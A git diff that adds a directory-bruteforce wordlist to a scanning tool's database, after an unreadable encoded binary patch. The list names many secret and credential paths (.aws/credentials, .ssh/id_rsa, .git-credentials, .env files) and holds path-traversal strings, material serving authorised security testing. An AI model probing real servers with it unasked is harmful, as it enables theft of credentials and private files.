z_@)WIpdvtWlTUz^DteD0jVi_VWFQU6BhA7>evJ+}z@xwbhzpl*0w*iHY;7^|AFA5M
zjsb^{{Y-3)tFu>;sl{bHUxHmYE<W~8)j`R>50aPkM#GpX3j#k*i;mP7CVhh;C->jX
z@421gv)D2KOs&`+yUKOV5|>mo!4lk@5<dQ6h<efSRlT|EUS&hf-;cYX1^fA5FnS=M
zWMPbO%TN45#ad1U-D-{RRsj(i?&eji-7J$f`0@X96Csd!TXFO(1utO8Bn^th+Yobg
z0^*LN$N99HW!^s}I*KtP5qEr_S}Qc9L6WGKHc<uB?kUogO4m@5UxFsZF!V?C#q!)+
zU#G2Q*;Y60G_R>!bY(XE(J_0|4vbml#nN-J<pFn#H{bs>Ga?XR_lwqQ@piifzIP2)
zi-C-hO4Z?sNi;ZF(z+XSwFWz!e<pQnZEKef&*+P{UHIozX%DwUNZ%_mQ$iOm7u8JE
z(o{pm^pr*3OQHafNQzg<9jEG3?Y=0s2wR+A#TIH{!LoJqW6e8B3d@pK<|yfPG2*{r
z8U7e<>{`_l){T>cTfSV*zhMt1>C~w2l~gvXf2ka4RWx>IQ3oMmpg2Dr-8u%+>d7QU
zYi+O*xDu>ki~ZL?Ox}(t@4-r837A`#iP%*cv}(z-`=R6~!Se?Ko0!G@rchliC@Z41
zAk%Na2BgChbR9QZ*_EG6DTo_}mA)k5wrQGH0`Lxq(KMQ;>LKKaB>JSXX4T4cLO){}
zZ^G%dvS!P<Ge6nfVn5h4m!VmTCA|1Dyc{#iYKbb@$KE`YH*ZOLnEoGt5ncBoK?AP9
z1$u(ISTl{^PJ%=p3H&mA^{CNaE)e8lNPQ*sSnBa58_w)ad@~B*LZB{V!4({}%@^dO
zKIKUzo8J7xl9i#GiZ+O$IfRJsZ2G5UW%KA(%co%w{NVk%I0DBbK)(=VoQTm@V}9Ba
zB2K-~p<hMn$6p$!<)9=@IucHDN}ggC8kkd6ZsI4wL^Ln&H-{zMZ5k_*EFYYqwJY&O
zcf^ef*7S7?wNN5ncsUR<?@QFI<`az+mAcyGDq3@Q?({hCbpf~X<CdQXssvSHYxVim
zJUhH1Y6xJ?SR2con$Vdl1ZOdG0L3+WP{2faUwu;3tCM1e<jw+@z`Z_)@v@Ll5J6#0
z<8Z%{%<7}+<*b!oVaD=Ar4F+WGAdwJrA2n_98|koKU^#&K{l!(aFecTbe|gz5e_1D
zhmpiuW}OERe&W7y5$QR!vZO=u9K=p_s}x+nf&)FEv7yp|s$}ZKIR|3NI{&NknRLwp
zfI2|_M~EM<Z2$fjadkW=yJ(79x-4#p%Md_K+5sAvmC|e?p9bS7Scm?H&DGW@VKa5c
z*i5#sHFd}}3l6(YNrk(*@*S$-Q3Ns|((i_#6aA-2rd+q#oOB9qlB&#7uvlYi(6IpY
zeN&qlxQ0bkC&x`57;Ta%E+?huud{ocmPlw|RRdEFhD|ZevPH;>{s`(8-uR0OPJ!?u
zJv_}q?OB5{U6=)^0TFFgTR|pPEJ&!<(nR#SBaUU@C9AuaN^ljW9yDKuuA7|D0v+5P
zIMnG1oT^D=Mx&wJ@R01|5?kO4BsY@y`s4<~MRKC~DzG}A$CBv>Mae!YL$OH=;$n%H
zAPu?pTF6#57J^RYFEBQ<BdCHUU<D<31&o021%{*Y8z1Ete;qznyFgWoXN&uaA-@?&
zH@MLmQ*z3FjzsX+#z07o0rDVlMx`}AoEzTF-vEa5i^V!(7pY^b3;ni^gK)8|&%0@j
zJL%H(E4RVBy0!@&RO>dyO_SQcx*6qam_bSTsh#VoBH=PhUt@fzAqG19VuAPnjA{Ju
zdM35G%M$4OLsLV{DT%IPt0Swe5@>BQbs)3<zcm{rFH1(TCRi-qX0x{}LMr9AuP5Uy
z8%=!};S&SC4lWE{j27FLh8)<<yRT_Z^y%8wOhPo~(-2S9Cm?zb8jLGwYpm4*S9!Vx
z0t;_XFsI%F3&woF#Hjnb37s>r?<U<a5qkcp)_BMYW|(Y3SzMY{BCcT@jH2rJHIRo7
z@*2_}=j{Pj2SWimXlN*Tmeg)i;P3~qh=UjT0S>O_p(yg?(FW1+EkJt*w=E6M(gC21
z+X#%hW(^0dS9P0#rUeHTKC9hQR?Z0$-=Da5dI~8ZyOy%&4x$dsR=R$ju%Rc)esBam
z>fc{nUv?NrY{9AqT=2mZgf}Xzjf+f(fpO?_B`VmG6*Tm~!xLL6l}{*(9h4Ni+Y!}#
zAkV=y$n=d2?Qd#81+@@H@Gzd0VlgdeP`#<Lyz>%zU@{zOT`iUyJ(44N_?M*NE_gZz
z^$xc|BFonGu*ZB3ctWy=9S<R3w6)#Lg_@U6Hdj%EtK24KjsQuG)irZa5x&aJ^z>G0
zPsN{7`&E-0LGZlde!&L13$YZDD&S5qR&?5>8@54f4uZ@6Lx6K_8eHL_adYAbItxR0
zLeLS}A#lje>9mk4b9{RJa&V4DiGd<jAc0@iuDcn9>&(Gju!4t+fV~EC#gia$N72-w
z`PnTf%bbp<aj{SaD<c0QVnE7}Z{VM<euOT<T#+;SzuJ^ne}F!dmT&0@SlILl_9&y#
z3UrVb*i#Fqp&qT_I)Px^rd(2xIBXpVinu#b0=AT<Gryyupb!CfAEt2h)Ym3+8K#&F
zOQb3s|0^-eWru^bL(-{-7Q}~J`9isCK9?Eq=K*+(U=y=On?dNFUDn!oCqSsvEr1hG
zdQ?XVm^4NRRlXiu7*@B}(h4ykQ<Kd=q*L5+Spj(%P_On7uuotFjG_^xbymA9DuLaf
z;#%&8vg&CE&$0$(&~jd&2cp8k=;0O;x*@DaF&e6qC07O2M(}o*hIi|@C@$`+(0Sd?
zz(h|I0*jSi>jo39{vO##(`^auW$41kpjwg$QDak%X4NIgN213;Fsv6qj~V|1!u+Jq
zLL}@#>4t`>Z9MqU(<!Mku^o~OyERA0vaemIc#n;<d(#WWQhyJq4JWf8Q_m3lp$bNY
zq%$vfy|Ynba(G^p;_aN~P~?-vHzMf$FT~rn6s(OLp5{34W<KfZ&6u~o5y6GH*USbF
zDixLifzLGox2KNeJ_Q_r?V{G{QE9(I1EO!8GIy)yo;u~-Ww6^jX}2lKe7aPm^EA&*
z8aLf7aHid8`Y)x|IQaHj$5K+!ZGp~E*@%(iYPlkip<OWNNDde&ta2_QdF?D1odcep
z5vtN6=QM-h$<f%<;biBLQ!#YSelnZvE4Id`r*D{PFkMac?X!5XeGL@oE)(;v{(L!<
zlgqOBy?t3rX!^P)&mAa2+JUdEbS!|_p#is+H<05xr+WG>*Qsr|)$$+3BM#*VPP!2j
zzS|_QE2)A~;RDKqBT&5VnDwEYCqUjN`BzG%5NzpfMi&oB)nGZqIxdqDRR2kfvELGA
zloZWzk72i<yaVJ#iY!6GN*SxljB_Dp&7jw#rv}b-LFGL{m@>7gXuw~-R-1bBmCse8
zLpgsNa~4k78IXdEbVnR#XAi6%EAah6wvI-jZs1v|Qe#+JzKEi4cM?ye5sG#cVshHE
z)mWeK87t2n`Um`wh`hgTRH}bqcmZ5fpYQ!^hx)|LfaqJnb?G7(HXomm&QU>686c}$
zvfktT8{1SZl$GBa&}fM0-i3i%%qiQ_pj0X%sY6~X!7NhT#G7M<XT+DC<-`Bep}BFf
z6DB8t6k4ooAm2TJz@Ddbyd9x}k54*HF1;(i(JbLc!R0nE_T5MX0dlReoKSK_rjcdV
zGC@<Bf{YbegStp=_z1G|G%TnJ60&OZamZG}p&><PR3oB?+c?V-bNMz3P|Kvx{5O+}
zKae452qr1(VHxeF`NvenG`AwZk>x-SPAaoBRK*c~7r`%Uav-oYXk&oi8-pnivb6UK
zsPWJh;H*O576EdRfW<P+H)^0ym@$;&2X&80v>$F-sKTTYbKyyAIU@)qxSu@91Sp7p
zO<FCA2lQ|l9lh_mR{H&<yNuXI>?p$MU_n#s1r%<=MbEqRF{MXL2N-Rk4MJ>7!8gbX
zHcZ!oNVJR^k_k=Yy5BnI+E7XOAqhC)Rw}6umrd)7*7oj+9D(bcwW5+oMuHUizUGmU
z+J@lf{EFDzp`F1h775thCVO-^r-RXCBx1-oRo?v!d_CoWQg!jXPaR-F{Ld44`V_1P
zy#vl=$VAKAsB;Vf1p-V-6?J82@EqLxQ1q@H4>)v4oGf;57-(!)SFdGs*O)N`r~<V4
z)|VwG5vr(7`ULwb#V7~vFYmgzb#Jau-BrI{0)PlTq5C0*3n*0RGkBDsBk`FQCjZ=D
zQZJ7GXNw|R6L&;{lx&+&g=MIo`Msf=v%GH`M@?r?%L8Ft9iFG9A(7pSQso{Wg(S1(
z)F)JGqZ?AMGIhpIz^W8%P!eq#;*p~L&u~gRK}HFA`CI_+Dl@V;j=uGTD`siKBUDvx
zmBqLhBvS;hF7k=j$VdcT3I_q2JFzB_>PrLLMDtPh8(ZdzVuAC<(UkZUuf%2;!%+Mc
zlPMP<kyK%EG$jh^y@kbd7-ngnFixn@e+ZIC_mWpHS>XorWSoiIZO^>pg=uDSPU3fl
z`alDf%B2*lK3B@K{vN`yhj=&v9?lmo?bFg=PIj^T^`IX)FZz&Z`h-C~c5byC6#>!0
z9ZV!$OYAq>yY0?msGxZkq!BnKm$vmajmoxv++3=&P80Y}-Wm(=7>E>ej*CzG0*BYJ
z;r849rzHE8QdC4Oe@vD?ggH`LG+>u^QqxxJ6y<Z3q)(CRWZciS_``Q~F@hfrL!<Vw
zG3XQ-EQ^_ObFH%+E|9c}vR4-iNJLL5%q)HledAseS}}o#GxHswF&GA>#t{yMtc4bM
z0=EX+aX|)v+gCKtqeNaK-WC@FlxZU*<r$KyKwIxxs0n#EbeEK80aRjeF)Ai7xM7g{
zQ(S~kM%S{+E9R%7Q^47qCisVWWOli!XBrs8e_Pn#fyG1eY0U(q_o$305tRcpvs@l{
z5tfYL@9}Pl|HH1<mxF~tBFfp#P$gXp=N$E~A-=)Wtt!}F(pmUNeAuh5^?cw$`H`V=
zOSi1A7MtP|zsl>U1&ejByuV0@27mGdXhI_eI-+i!jm88!w7AOYfa`y7HVNKP9Ehl&
zql#vwN|EV81R@~MT5Qb&_Q`;lBbs|@-BTl%AP_h$CF5&&Aiw{m8&j_y#~3#>o@yeW
ziNr!l@H+7+hqt|IIbI^3pN5h8Mds!7GfcEpM<*F|C>(gafjbh{CFoaYe3xQdFVFla
z(N}sE6B07=1Cagf1-?R1%Z{sJr&hrW*f`7kY>N!YX#ltwPxiO5taUK=12qynu8c6)
z`2?R4(if4XGY#-bgJK!*{<+S9Ka&Cj82l@lk*;Kgm1H{fw7Mcpq*5Zd40-lci7xj3
zu~k#U0a9;r?K2D)CxMqDbJVG>dhaUHNn9eO>VR(npl4&qxO~M-7(K-MJ52n@0rY=s
z8}LCu-)I^O^)>!!@dv!_p%4iJ)jj%VR2YbHjZ)q62$GAxmn<TTC^0^-Lq-=}i7*}j
zQ6AL9UD7w5C3D1F$EPcYP4mc~0jLVV!B``D&2|>zSQ8QBX3R_L#GIb;^~^t47=2oR
z^zK!K&eru0cml0u)hF{fVWB;~TsveC-LYS;RdX8c8ASdc-^01}Iu5Vt4S-c(c@cV^
zn0YP)l>G%wWO;9Xa3}88LhTawuLuD85!bePp1Lk1i{&mq@fbMDYW}eXSyO$Z<xTME
z07F19^hu*0JdN&VeGMyFvOlvO9@K|ODCqzyw^6E+TE#*@%dEFv`-C?FA$%}}VYUn3
z<Wv9aKhfWJ5b1<ZndJD_S3etN>XYDSRX={ulY<tpH5(X?4#yLT@I4-t$*8TCK#l`4
zb9sXS$0H%z=PF8qi3%dB0Nm10=*T}E090&WMZ&j1G5(?Hv2O<6LSR?KeH}i$$)I;q
zaM7aJX(3(8Q6t9CO*+CYENs6wP_Ctsj57NO9tNe|8Ub}{|I!U<zW=PkkBE*(J4Ddx
zqiBtOmAJn%-0g+W(}&wIGpYK#(xOO6XJnur3m?Ln3R+GPVES^7aftVkl~A27R>^vV
zsuqhqv?8&&6!66P0PGx@ECVv@nE?{Ih-0cD5&}y#4HBWH^|Mw9JYBPw$?abBARG4B
zyeUG5OzJkjhQ`;x2Lx}Q_;RZW8W6Nubdf*N54#a;+V6E*5~(TcEL(ynW){$5<8goR
zoq7hjL3tnt@QwGQvJIjF;s6SgM)Haw00Y-umt&jQqzks~Q3Q<o;R}mwK3^~QSsY|m
z%gs~i{$;~%efm?}9E)chH(_?)qd2hBDDx~Kg&p0Q5wUHV{a@MfzXQL4zXl?KJ2y{M
z9V9?O)4yfs^EdB_T)8kl0^VdXBQ6DEQS~NCHeUu)K)F?;_yM3C!WE%2-n%>jt#`h8
z2E;G1)NkcEskFKB`OZ2e(ND2dM>c1Nvm$mrCd49WqiSswypT+f|8+o1lo-pOfh1*5
zP2wS?)=A$KbVB$Cr{WK8+-o+}W5Db9ZO}b*IxhT!^c?G;B7{Zjn<rQ!W#;V?&8dUX
z4tkce^~gri;bQ@~p95ksBC^{u%-s{Q#Ulbcyo0@9(FbeA(XxO1bARaHNXDv}x-)MG
zUEz%O53}I_AA-^gGwQFO)49lmFo5{>MbC+5zzP1X5$Dz|s`}A3xUYQPFe-@mjpqaK
z!ROzM;j5%dncvS_gMsor>cU+9XJ-Yc$EneVA(YE}MjJpoK_}q6prIV-7~`wKJR<cS
zXvHt6?qvQhV7VLAI~*uwc}gQM+MP#`Fe36GWaJ5ubLu(h^6sYe@;9Jhhl6?U4dUQu
z>6rRop~5n#Ad&bCmA0J+?uD1fsii8D+dT^DWAF=;DGYg^+kD3R3>UOmMVb6sWDFZ3
zKX`%-0Lw2kYZU=_VpZODsNPmLy40DRBjaXnwT_2*vCemM%?1{cN`WDuraEDuAV*^~
zf*YJmo&BVTIVR7sN!WP@kF{BU32JdGR6Z<+LnXB`AcgD%BDZbnI!0I}rk<jvsyc*d
zpF&y>?G>%8<GqKk$E~MFwOgtp$7NttAsGEz=+&P>frF34`*E6MNJTG(USHy9+ya&I
z^z`lOj^~k9l!u+B^xRoD+Gk(ajN?Wl_X?B7?K2QMJ$FHe{JqlVvg<6iG6)WO!BW=c
z4viQbb1BsGVRsg4qJk^>mmTJQCJV?YyiJ&V;w?ksyNo`Ri<!5mg~1r`*Gnizm$ilM
zUOu>^!N5FJF{-l0R3WMyABq+Q(Cx_lty+j<5&IJoPjNI2XhRcQI5d*Sb}m8XlXylo
z6o<!z%7To70<kSs1KWTCs7j7GnUrAKg<wiJhjPENHF$nwl83@-Xhs1^qbPl+wNMUD
zsvIc)FtlPEmwr*qj<Eh0h^=A~$fTl7usTepLxh4ARt&XM>ucEio&6HZy=jO`iNAW-
z+?SW{oWXRZC@BNx=fn10BIR@{>UH8hNAh`dFZAg(z`$~m(ms=pu_jQlBD(Ymf=shJ
z?#4T3MZ;eCtoF<Rz~TMp9%a`JgL{358UzLTECwrt-8NKGzk~}^Z|?do*xJno65>x!
znZ?AcHLIL%w_j&rI^h=#NjauuUG8KoxU}K?X4-7QlY6A`_yW%N+?o+FBZ7k&3X@S4
zf{-(DK@wr!%5Q$Riut*~1~tlyF`1N$yasb7^YX)BaeWx&8R{@Z#j14(A*lr_Y%hA6
zS(~5a_=)^G=sJ4RzgwZ9F=D?n%Knlgjmv2S_#cF2vN}g8Sv+Qd9oiiq=u({^ln3)8
z&6|anwC}}h5TiShBAw!%q+<{~vF9QmwFcpUR~p<p2bM~&SS?VZUs;-B0i`XmWF&Q2
z5Yd+fLRrfKB{*rpm6R4BB_S<1X|e@fP`2PAF}C2v{w*Lm-~xakzXcXfa{-BME-1t^
z7no?Z3nXK^U?!zqFp@wo2vPI`f$Z}FCAhxeNZA)4B-Iz3Gy?`LJYaB@Sis<7LKsjj
z<9{#tb`47U^3dH_3{hPxhR2B<LkZ0>EzHC*po5JJj@FS0LXwfeOGjnUf>Z`qiKh%M
zc9;Q?5i<Y;3o|g`ycrOShK}C6vCLVxH~nl4R3BSbP*|T@GN@IrEhy-$w_122s<%zc
z*@Pmk*<g~|HV7;^zh1F)P>SBSke~~=&rv-flIRC!w@e}`xm83Q4GsPgoD{ULvn24;
z9H;J(hf!~NvP3fP>;8$DrcP~%hLao%2VrPtqnGVZ%Tk#){x=4JKnwTzvk>%$)F?}P
zlUauLljZnf7FnQyCL>b1H|MFE;&Sw1J5Cx?N0F(=c;Kg%>z55n87$@HScvMQqN=Kj
za=_MrcJbU*WT{-=KCy5$f0Mm7827~Q5o`s?q8n5_u}BP@;X4u6aR#w55Y&PWi&XHN
z%5GI@tp^6Qr1+lAbP*_tD;OVe`agtH3p~8mXt|-*u!yiCZx%BZ!mjus>*z31DGae?
zw6_oLOq?8L2dJh_Gf2lCtON3c84krn>P37Pq)L^2W@H-;<)8|^2Emc7X0iPNH)|sx
zm1Nig6vso*wahM`B8oaG>OKC2<@>pOabT+1Hc`pG439jZwpjZXwzF&8#-*OnK_~z*
uJQkXJL5ilb#2s{HLVBo?h8+huFf9~W*L`|!U=uA>CN++l_*et7E1i}-^;3BO

literal 0
HcmV?d00001

diff --git a/db/directory-bruteforces.txt b/db/directory-bruteforces.txt
new file mode 100644
index 00000000..228a9bd2
--- /dev/null
+++ b/db/directory-bruteforces.txt
@@ -0,0 +1,5332 @@
+!.gitignore
+!.htaccess
+!.htpasswd
+%20../
+%2e%2e//google.com
+%2e%2e;test/
+%3f/
+%C0%AE%C0%AE%C0%AF
+%ff/
+..;/
+.7z
+.access
+.addressbook
+.adm
+.admin
+.apache.env
+.apdisk
+.AppleDB
+.AppleDesktop
+.AppleDouble
+.apt_generated/
+.architect
+.aws/credentials
+.axoCover/
+.babelrc
+.backup
+.bak
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+.bower-cache
+.bower-registry
+.bower-tmp
+.bower.json
+.build/
+.buildpacks
+.buildpath
+.buildpath/
+.builds
+.bundle
+.bundle/
+.byebug_history
+.bz2
+.bzr/
+.bzr/README
+.c9/
+.c9revisions/
+.cabal-sandbox/
+.cache
+.cache/
+.canna
+.capistrano
+.capistrano/
+.capistrano/metrics
+.capistrano/metrics/
+.cask
+.cc-ban.txt
+.cc-ban.txt.bak
+.cfg
+.cfignore
+.checkstyle
+.circleci/
+.circleci/.firebase.secrets.json
+.circleci/.firebase.secrets.json.enc
+.circleci/config.yml
+.classpath
+.cobalt
+.codeclimate.yml
+.codeintel
+.codekit-cache
+.codio
+.coffee_history
+.compile
+.composer
+.concrete/DEV_MODE
+.conf
+.config
+.config.php.swp
+.config/
+.config/filezilla/sitemanager.xml.xml
+.config/psi+/profiles/default/accounts.xml
+.configuration.php.swp
+.consulo/
+.contracts
+.coq-native/
+.core
+.coverage
+.cpan
+.cpanel/
+.cpcache/
+.cproject
+.cr/
+.csdp.cache
+.cshrc
+.CSV
+.csv
+.CVS
+.cvs
+.cvsignore
+.dart_tool/
+.dat
+.database.env
+.db.env
+.db.xml
+.db.yaml
+.debug.env
+.deployignore
+.dev/
+.devcontainer
+.directory
+.django.env
+.dockerignore
+.drone.yml
+.DS_Store
+.dub
+.dump
+.eclipse
+.editorconfig
+.eggs/
+.elastic.env
+.elasticbeanstalk/
+.elb
+.elc
+.emacs
+.emacs.desktop
+.emacs.desktop.lock
+.empty-folder
+.env
+.env.backup
+.env.bak
+.env.copy
+.env.dev
+.env.dev.local
+.env.development
+.env.development.local
+.env.development.sample
+.env.docker
+.env.docker.dev
+.env.local
+.env.new
+.env.php
+.env.prod
+.env.prod.local
+.env.production
+.env.production.local
+.env.remote
+.env.sample.php
+.env.staging
+.env.test.sample
+.environment
+.error_log
+.eslintcache
+.eslintignore
+.eslintrc
+.espressostorage
+.eunit
+.external/
+.external/data
+.externalNativeBuild
+.externalToolBuilders/
+.fake/
+.FBCIndex
+.fetch
+.fhp
+.filemgr-tmp
+.filezilla/
+.filezilla/sitemanager.xml.xml
+.fishsrv.pl
+.flac
+.flowconfig
+.fontconfig/
+.fontcustom-manifest.json
+.forward
+.ftp
+.ftp-access
+.ftppass
+.ftpquota
+.gem
+.gfclient/
+.gfclient/pass
+.git
+.git-credentials
+.git-rewrite/
+.git/
+.git/config
+.git/HEAD
+.git/index
+.git/logs/
+.git/logs/HEAD
+.git/logs/refs
+.git2/
+.git_release
+.gitattributes
+.gitconfig
+.gitignore
+.gitignore.swp
+.gitignore_global
+.gitignore~
+.gitk
+.gitkeep
+.gitlab
+.gitlab-ci.yml
+.gitlab/issue_templates
+.gitlab/merge_request_templates
+.gitlab/route-map.yml
+.gitmodules
+.gitreview
+.gradle
+.gradle/
+.gradletasknamecache
+.grunt
+.grunt/
+.gtkrc
+.guile_history
+.gwt-tmp/
+.gwt/
+.gz
+.hash
+.hg
+.hg/
+.hg/dirstate
+.hg/requires
+.hg/store/data/
+.hg/store/undo
+.hg/undo.dirstate
+.hgignore
+.hgignore.global
+.hgrc
+.histfile
+.history
+.hpc
+.hsenv
+.ht_wsr.txt
+.hta
+.htaccess
+.htaccess-dev
+.htaccess-local
+.htaccess-marco
+.htaccess.BAK
+.htaccess.bak
+.htaccess.bak1
+.htaccess.old
+.htaccess.orig
+.htaccess.sample
+.htaccess.save
+.htaccess.txt
+.htaccess_extra
+.htaccess_orig
+.htaccess_sc
+.htaccessBAK
+.htaccessOLD
+.htaccessOLD2
+.htaccess~
+.HTF/
+.htgroup
+.htpasswd
+.htpasswd-old
+.htpasswd_test
+.htpasswds
+.httr-oauth
+.htusers
+.hypothesis/
+.idea
+.idea/
+.idea/.name
+.idea/caches
+.idea/compiler.xml
+.idea/copyright/profiles_settings.xml
+.idea/dataSources.ids
+.idea/dataSources.local.xml
+.idea/dataSources.xml
+.idea/deployment.xml
+.idea/dictionaries
+.idea/drush_stats.iml
+.idea/encodings.xml
+.idea/gradle.xml
+.idea/libraries
+.idea/misc.xml
+.idea/modules.xml
+.idea/scopes/scope_settings.xml
+.idea/Sites.iml
+.idea/sqlDataSources.xml
+.idea/tasks.xml
+.idea/uiDesigner.xml
+.idea/vcs.xml
+.idea/WebServers.xml
+.idea/woaWordpress.iml
+.idea/workspace(2).xml
+.idea/workspace(3).xml
+.idea/workspace(4).xml
+.idea/workspace(5).xml
+.idea/workspace(6).xml
+.idea/workspace(7).xml
+.idea/workspace.xml
+.idea0/
+.idea_modules/
+.ignore
+.ignored/
+.import/
+.influx_history
+.ini
+.inst/
+.install/
+.install/composer.phar
+.installed.cfg
+.ipynb_checkpoints
+.jekyll-cache/
+.jekyll-metadata
+.jestrc
+.joe_state
+.jpilot
+.jscsrc
+.jshintignore
+.jshintrc
+.jsp
+.JustCode
+.kde
+.keep
+.keys.yml
+.kitchen.local.yml
+.kitchen.yml
+.kitchen/
+.komodotools
+.komodotools/
+.ksh_history
+.laravel.env
+.last_cover_stats
+.lein-deps-sum
+.lein-failures
+.lein-plugins/
+.lein-repl-history
+.lesshst
+.lia.cache
+.libs/
+.lighttpd.conf
+.listing
+.listings
+.loadpath
+.LOCAL
+.local
+.localcache/
+.localeapp/
+.localsettings.php.swp
+.lock-wscript
+.log
+.log.txt
+.login
+.login_conf
+.LSOverride
+.lynx_cookies
+.m2/settings.xml
+.magentointel-cache/
+.mail_aliases
+.mailrc
+.maintenance
+.maintenance2
+.mc
+.mc/
+.members
+.memdump
+.mergesources.yml
+.merlin
+.meta
+.metadata
+.metadata/
+.metrics
+.modgit/
+.modman
+.modman/
+.modules
+.mono/
+.mr.developer.cfg
+.msi
+.mtj.tmp/
+.mvn/timing.properties
+.mweval_history
+.mwsql_history
+.mypy_cache/
+.mysql.env
+.mysql_history
+.nano_history
+.navigation/
+.nbproject/
+.netrc
+.netrwhist
+.next
+.nginx.env
+.nia.cache
+.nlia.cache
+.node_repl_history
+.nodelete
+.npm
+.npmignore
+.npmrc
+.nra.cache
+.nrepl-port
+.nsconfig
+.nsf
+.ntvs_analysis.dat
+.nuget/
+.nuget/packages.config
+.nyc_output
+.old
+.old.env
+.oldsnippets
+.oldstatic
+.org-id-locations
+.ost
+.packages
+.paket/
+.pass
+.passes
+.passwd
+.password
+.passwords
+.passwrd
+.patches/
+.pdf
+.perf
+.pgadmin3
+.pgpass
+.pgsql_history
+.php-ini
+.php-version
+.php_history
+.phpintel
+.phpstorm.meta.php
+.phptidy-cache
+.phpversion
+.pki
+.placeholder
+.postgres.env
+.powenv
+.pre-commit-config.yaml
+.procmailrc
+.production
+.profile
+.project
+.project.xml
+.project/
+.projectOptions
+.properties
+.psci
+.psci_modules
+.psql_history
+.psqlrc
+.pst
+.pub/
+.pwd
+.pydevproject
+.pylintrc
+.pytest_cache/
+.Python
+.python-eggs
+.python-history
+.python-version
+.qmake.cache
+.qmake.stash
+.qqestore/
+.Rapp.history
+.rar
+.raw
+.rbtp
+.RData
+.rdsTempFiles
+.rebar
+.rediscli_history
+.reek
+.remote
+.remote-sync.json
+.repl_history
+.revision
+.Rhistory
+.rhost
+.rhosts
+.robots.txt
+.rocketeer/
+.ropeproject
+.Rproj.user/
+.rspec
+.rsync-filter
+.rsync_cache
+.rsync_cache/
+.rubocop.yml
+.rubocop_todo.yml
+.ruby-gemset
+.ruby-version
+.rvmrc
+.s3backupstatus
+.sass-cache/
+.scala_history
+.sconsign.dblite
+.scrapy
+.scrutinizer.yml
+.selected_editor
+.settings
+.settings.php.swp
+.settings/
+.settings/.jsdtscope
+.settings/org.eclipse.core.resources.prefs
+.settings/org.eclipse.php.core.prefs
+.settings/org.eclipse.wst.common.project.facet.core.xml
+.settings/org.eclipse.wst.jsdt.ui.superType.container
+.settings/org.eclipse.wst.jsdt.ui.superType.name
+.sh
+.sh_history
+.shrc
+.sln
+.smileys
+.smushit-status
+.spamassassin
+.spyderproject
+.spyproject
+.sql
+.sql.bz2
+.sql.gz
+.sqlite_history
+.src/app.js
+.src/index.js
+.src/server.js
+.ssh
+.ssh.asp
+.ssh.php
+.ssh/
+.ssh/authorized_keys
+.ssh/id_dsa
+.ssh/id_rsa
+.ssh/id_rsa.key
+.ssh/id_rsa.key~
+.ssh/id_rsa.priv
+.ssh/id_rsa.priv~
+.ssh/id_rsa.pub
+.ssh/id_rsa.pub~
+.ssh/id_rsa~
+.ssh/know_hosts
+.ssh/know_hosts~
+.ssh/known_host
+.ssh/known_hosts
+.st_cache/
+.stack-work/
+.style.yapf
+.stylelintrc
+.sublime-gulp.cache
+.sublime-project
+.sublime-workspace
+.subversion
+.sucuriquarantine/
+.sunw
+.svn
+.svn/
+.svn/all-wcprops
+.svn/entries
+.svn/text-base/
+.svn/text-base/index.php.svn-base
+.svnignore
+.sw
+.swf
+.swo
+.swp
+.SyncID
+.SyncIgnore
+.synthquota
+.system/
+.tags
+.tar
+.tar.bz2
+.tar.gz
+.tconn/
+.tconn/tconn.conf
+.temp
+.temp/
+.texpadtmp
+.tfignore
+.tgitconfig
+.thumbs
+.tmp
+.tmp_versions/
+.tmproj
+.tox
+.tox/
+.transients_purge.log
+.Trash
+.Trashes
+.travis.yml
+.tx/
+.txt
+.user.ini
+.users
+.vacation.cache
+.vagrant
+.venv
+.version
+.vgextensions/
+.viminfo
+.vimrc
+.vs/
+.vscode
+.vscode/sftp.json
+.web
+.web-server-pid
+.web.env
+.webassets-cache
+.workspace/
+.wp-config.php.swp
+.www_acl
+.wwwacl
+.yardoc/
+.yarn-integrity
+.yo-rc.json
+.zeus.sock
+.zfs/
+.zip
+.zsh_history
+.zshrc
+/api-doc
+/api-docs
+/api.html
+/api.json
+/api.yaml
+/api.yml
+/api/2/explore/
+/api/docs
+/api/package_search/v4/documentation
+/api/swagger
+/api/swagger-resources
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger.json
+/api/swagger.yaml
+/api/swagger.yml
+/api/swagger/v2/api-docs
+/api/swagger/v3/api-docs
+/api/v1/api-docs
+/api/v1/documentation
+/api/v2/api-docs
+/api/v2/documentation
+/api/v2/swagger.json
+/api/v3/api-docs
+/api/v3/documentation
+/api/v3/swagger.json
+/apidoc
+/apidocs
+/application
+/backoffice/v1/ui
+/build/reference/web-api/explore
+/classicapi/doc/
+/core/latest/swagger-ui/index.html
+/csp/gateway/slc/api/swagger-ui.html
+/doc
+/docs
+/documentation/swagger-ui
+/documentation/swagger-ui.html
+/documentation/swagger.json
+/documentation/swagger.yaml
+/documentation/swagger.yml
+/internal/docs
+/openapi.json
+/rest/v1
+/rest/v3/doc
+/swagger
+/swagger-resources
+/swagger-resources/configuration/security
+/swagger-resources/configuration/ui
+/swagger-ui.html
+/swagger-ui.html/v2/api-docs
+/swagger-ui.html/v3/api-docs
+/swagger-ui/
+/swagger-ui/index.html
+/swagger.json
+/swagger.yaml
+/swagger.yml
+/swagger/index.html
+/swagger/swagger-ui.html
+/swagger/v2/api-docs
+/swagger/v3/api-docs
+/swaggerui
+/ui
+/ui/
+/v1
+/v1.0
+/v1.1
+/v1.x/swagger-ui.html
+/v2
+/v2.0
+/v2/api-docs
+/v3
+/v3/api-docs
+0.htpasswd
+0.php
+0admin/
+0manager/
+1.7z
+1.htaccess
+1.htpasswd
+1.php
+1.rar
+1.sql
+1.tar
+1.tar.bz2
+1.tar.gz
+1.txt
+1.zip
+10-flannel.conf
+111.php
+123.php
+123.txt
+1c/
+1c_exchange.php
+2.php
+2.sql
+2.txt
+2010.sql
+2010.tar
+2010.tar.bz2
+2010.tar.gz
+2010.tgz
+2010.zip
+2011.sql
+2011.tar
+2011.tar.bz2
+2011.tar.gz
+2011.tgz
+2011.zip
+2012.sql
+2012.tar
+2012.tar.bz2
+2012.tar.gz
+2012.tgz
+2012.zip
+2013.sql
+2013.tar
+2013.tar.bz2
+2013.tar.gz
+2013.tgz
+2013.zip
+2014.sql
+2014.tar
+2014.tar.bz2
+2014.tar.gz
+2014.tgz
+2014.zip
+2015.sql
+2015.tar
+2015.tar.bz2
+2015.tar.gz
+2015.tgz
+2015.zip
+2016.sql
+2016.tar
+2016.tar.bz2
+2016.tar.gz
+2016.tgz
+2016.zip
+2017.sql
+2017.tar
+2017.tar.bz2
+2017.tar.gz
+2017.tgz
+2017.zip
+2018.sql
+2018.tar
